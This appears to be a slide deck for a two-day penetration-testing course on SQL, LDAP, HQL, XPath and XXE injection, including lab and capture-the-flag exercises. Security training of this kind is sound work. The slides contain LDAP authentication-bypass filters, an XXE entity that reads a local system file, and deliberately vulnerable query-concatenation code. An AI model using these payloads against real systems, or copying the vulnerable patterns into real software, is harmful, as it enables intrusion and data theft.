This document provides information about a 2-day training course on exploiting injection flaws. It discusses the agenda which includes hands-on exercises covering SQL injection, LDAP injection, ORM injection, XPath injection and combining XXE and XPath. The trainer, Sumit Siddharth, is an expert in application and database security with over 8 years experience who has spoken at several security conferences. The course aims to help attendees think outside the box to find issues that tools may miss through practical CTF exercises.

1. The Art Of Exploiting
Injection Flaws
Sumit Siddharth
sid@notsosecure.com

2. About the course
 Hands on 2 days training
 Require out of box thinking (strong coffee
recommended!)
 20 exercises, 100 slides, 8 CTFs!
 Previous feedback:
 “ This was the best course I have ever been on. Since attending
the course, I have identified so many issues which automated
tools have missed. Thanks a ton, Sid”
 “I have been pentesting for 4 years now, and thought I knew all
about SQLI. I guess I was wrong. If anyone knows this subject
well, it is Sid”

3. About Me
Sumit “sid” Siddharth
 Speaker/Trainer at Black Hat, Def con,
OWASP Appsec, HITB, Ruxcon etc
 My blog: www.notsosecure.com
 Specialist in Application & Database Security!
 More than 8 years of Pentesting!
 Co-author: SQL Injection, attacks and defense
 Head of Penetration testing@7Safe

4. Day 1: SQL Injection

5. Exploiting SQL Injections
 Authentication Bypass
 Extracting Data
 Error Message Enabled
 Error Message Disabled
 Union Injection
 Blind Injection
 Time Delays
 Out Of Band Channels
 Privilege Escalation
 OS code execution

6. Exercise 9.8 – SQL Injection: OS command
execution
 http://hacklab.net/hackme_7.5/
 Objective
 Exploit SQL injection to run OS commands on the database
server
 CTF : What are the contents of C:secret.txt on the server
 Time
 10 mins

7. Advanced SQL Injection
 Insanely Blind SQL Injection
 Application returns same response
 Injection point in INSERT/UPDATE statement

8. Encoding/Decoding User Input
 Base64 decoding user input
 Hex decoding user input
 Real world examples
 WordPress Admin-Ajax.php unauthenticated SQL injection
 PHP-Nuke auth.php
$cookie=explode(„;‟, urldecode(empty($_POST[„cookie‟])))
$admin=base64_decode($admin)

9. SQL Injection in SQL Names
 Consider the following:
Dim cat, orderBy, query
cat = Replace(Request.Form(“cat”), “‟”, “‟‟”)
orderBy = Replace(Request.Form(“orderBy”), “‟”, “‟‟”)
query = “SELECT * FROM prod WHERE cat = „” & cat &
“‟ ORDER BY “ & orderBy

10. Hacking Oracle from Web
 Exploiting SQL Injection against oracle database
 How to extract data
 One Query to get them all!
 How to execute OS code
 What if we are not DBA
 Become DBA
 Execute OS code
 Drop DBA

11. Capture The Flag: SQL Injection
 http://hacklab.net/ctf.asp?data=foobar
 Objective
• What’s in C:secret.txt
 Time
 20 Mins!
 No instructions or hints this time!

12. Day 2: The Art of Exploiting
Lesser Known Injection Flaws
ORM Injection
LDAP Injection
Advanced LDAP Injection
XPath Injection
Xpath v2
XML Entity Injection
Combining Xpath and XXE
CTF
Q&A

13. Hibernate Query Language Injection
 User’s input to be passed directly to the
underlying SQL engine
List<Event> result = session.createQuery(
"from Event e where e.title='" + param +
"'").list();

14. HACKING LDAP
LDAP overview
LDAP injection
Blind LDAP injection
Hacking LDAP in practice
Securing Applications Against LDAP
Injections

15. LDAP Injection: Authentication Bypass
 (&(user=username)(password=pwd))
 Usually password is hashed and then matched with the
stored value
 Injection is most likely to work only in username field
 (&(user=username)(password=*))
 (&(user=username)(&))(password=pwd))
Anything after first filter will be
ignored by OpenLDAP

16. Exercise 6
 http://hacklab2.net:81/ldap/selfservice/
 PHP/LDAP
 Find the telephone number of employee Eric
Philip
 Time: 10 mins

17. XPATH Injection
 Agenda
 What is XPATH
 Exploiting XPATH
 Impact of XPATH exploitation
 Blind XPATH Injection
 Automating XPATH Injection
 XPATH v2 injection
 Insane XPATH Injection
 Defending against XPATH Injection

18. XPATH’s XML Nomenclature
Root node
Comment
Node name
Attribute value
Node
Node value
Attribute name
Node

19. Automating Xpath
 XPATH Explorer
 Demo time!

20.  Hugely increased feature set
 Regular expressions
 Unicode normalization
 String to code point conversion
 Remote document references
 All of these can be utilised to speed up document
retrieval and reduce the key space we have to search.
XPath 2.0 Features..

21. XPATH 2.0
 Allows to not just read the current XML file but any
arbitrary xml file on the file system.

22. Hacking Web Services with XML External Entity
 Not validating the xml files before processing it
 Attacker can inject an external entity
 <!ENTITY pwned SYSTEM "file:///c:/boot.ini" >
 Web service parse the entity and the parser
access the local resource
 Unauthorized access to information
 Post scanning
 Denial of service attack
 Breaking the xml syntax
 Providing files like /dev/urandom

23. Combining XXE and Xpath
 Did I say, with Xpath 2.0 you can read arbitrary xml
files on the file system.
 I actually mean:
 with Xpath 2.0 you can read arbitrary xml files on the file
system.
 Introducing Xcat

24. Thank You!
 Questions please...
 Sid@notsosecure.com
 Twitter: notsosecure